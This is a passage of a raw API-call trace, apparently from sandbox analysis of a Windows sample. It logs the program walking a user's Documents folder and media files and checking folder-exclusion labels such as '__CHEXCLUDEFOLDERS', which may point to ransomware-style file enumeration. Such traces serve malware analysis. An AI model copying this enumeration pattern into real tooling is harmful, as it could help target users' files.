ftLastWriteTime.dwLowDateTime=0x52b3ff80, ftLastWriteTime.dwHighDateTime=0x1d5dff4, nFileSizeHigh=0x0, nFileSizeLow=0x4db6, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Y8qF6zL.mkv", cAlternateFileName="")) returned 1 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.459] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.459] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.459] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x764cc0 [0073.460] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.460] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.460] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.460] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4813c0, ftCreationTime.dwHighDateTime=0x1d5dda2, ftLastAccessTime.dwLowDateTime=0xa7eda190, ftLastAccessTime.dwHighDateTime=0x1d5dde7, ftLastWriteTime.dwLowDateTime=0xa7eda190, ftLastWriteTime.dwHighDateTime=0x1d5dde7, nFileSizeHigh=0x0, nFileSizeLow=0xa2f, dwReserved0=0x10, dwReserved1=0x657690, cFileName="zkkA.wav", cAlternateFileName="")) returned 1 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.460] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0073.460] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.460] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.461] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0073.461] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.461] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.461] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.461] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.461] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.461] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.461] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.461] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.461] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x671ad310, ftCreationTime.dwHighDateTime=0x1d5e07e, ftLastAccessTime.dwLowDateTime=0x5571c040, ftLastAccessTime.dwHighDateTime=0x1d5de91, ftLastWriteTime.dwLowDateTime=0x5571c040, ftLastWriteTime.dwHighDateTime=0x1d5de91, nFileSizeHigh=0x0, nFileSizeLow=0x7952, dwReserved0=0x10, dwReserved1=0x657690, cFileName="_IlnDJr.mp4", cAlternateFileName="")) returned 1 [0073.461] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.461] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.461] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.461] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.461] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.461] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.461] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x10c007a, ftCreationTime.dwLowDateTime=0xc2917, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x116007b, nFileSizeHigh=0xc2917, nFileSizeLow=0x76b210, dwReserved0=0x10, dwReserved1=0x657690, cFileName="_I\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0073.461] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.461] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.461] FindClose (in: hFindFile=0x6b8a38 | out: hFindFile=0x6b8a38) returned 1 [0073.462] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.462] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0073.462] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0073.462] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0073.462] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaa89f20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaa89f20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0073.462] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0073.462] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0073.462] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0073.462] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0073.462] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0073.462] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0073.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0073.462] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8e0 | out: hHeap=0x650000) returned 1 [0073.462] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9e8 | out: hHeap=0x650000) returned 1 [0073.462] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0073.462] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0073.462] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b90 | out: hHeap=0x650000) returned 1 [0073.462] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0073.462] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8a38 | out: hHeap=0x650000) returned 1 [0073.462] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0073.462] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b90 | out: hHeap=0x650000) returned 1 [0073.462] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0073.462] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddb0 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a50 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd88 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9d0 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b10 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa00 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa60 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b00 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd10 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9b8 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690aa0 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a90 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9a0 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a7c0 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a80 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a70 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a30 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ab0 | out: hHeap=0x650000) returned 1 [0073.463] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0073.463] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ab0 | out: hHeap=0x650000) returned 1 [0073.463] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa60 | out: hHeap=0x650000) returned 1 [0073.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3480 | out: hHeap=0x650000) returned 1 [0073.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa60 | out: hHeap=0x650000) returned 1 [0073.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a80 | out: hHeap=0x650000) returned 1 [0073.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a70 | out: hHeap=0x650000) returned 1 [0073.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a50 | out: hHeap=0x650000) returned 1 [0073.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b10 | out: hHeap=0x650000) returned 1 [0073.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6d0 | out: hHeap=0x650000) returned 1 [0073.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a868 | out: hHeap=0x650000) returned 1 [0073.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a868 | out: hHeap=0x650000) returned 1 [0073.464] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2e8 | out: hHeap=0x650000) returned 1 [0073.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.464] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b80 | out: hHeap=0x650000) returned 1 [0073.464] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaa89f20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaa89f20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8a38 [0073.465] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaa89f20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaa89f20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0073.465] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23f02910, ftCreationTime.dwHighDateTime=0x1d56e6d, ftLastAccessTime.dwLowDateTime=0x3f09d90, ftLastAccessTime.dwHighDateTime=0x1d58c84, ftLastWriteTime.dwLowDateTime=0x3f09d90, ftLastWriteTime.dwHighDateTime=0x1d58c84, nFileSizeHigh=0x0, nFileSizeLow=0xf77d, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="0-MFkGR.docx", cAlternateFileName="0-MFKG~1.DOC")) returned 1 [0073.465] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0073.465] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.465] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b80 [0073.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2e8 | out: hHeap=0x650000) returned 1 [0073.465] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b208 | out: hHeap=0x650000) returned 1 [0073.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bb0 | out: hHeap=0x650000) returned 1 [0073.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.465] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.465] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.465] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.465] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.465] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bb0 | out: hHeap=0x650000) returned 1 [0073.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.465] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.465] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.466] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.466] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8a78 [0073.466] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.466] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.466] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.466] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.466] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.466] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bb0 | out: hHeap=0x650000) returned 1 [0073.466] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.466] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0073.466] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.466] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.466] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.466] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.466] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.466] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.466] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.466] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.466] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.466] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.466] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.466] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.466] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.466] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.466] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.466] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.466] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.467] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.467] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.467] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0073.467] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.467] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.467] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.467] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.467] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.467] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.467] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.467] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x764cc0 [0073.467] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.467] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.467] RtlAllocateHeap (HeapHandle=0x650000, 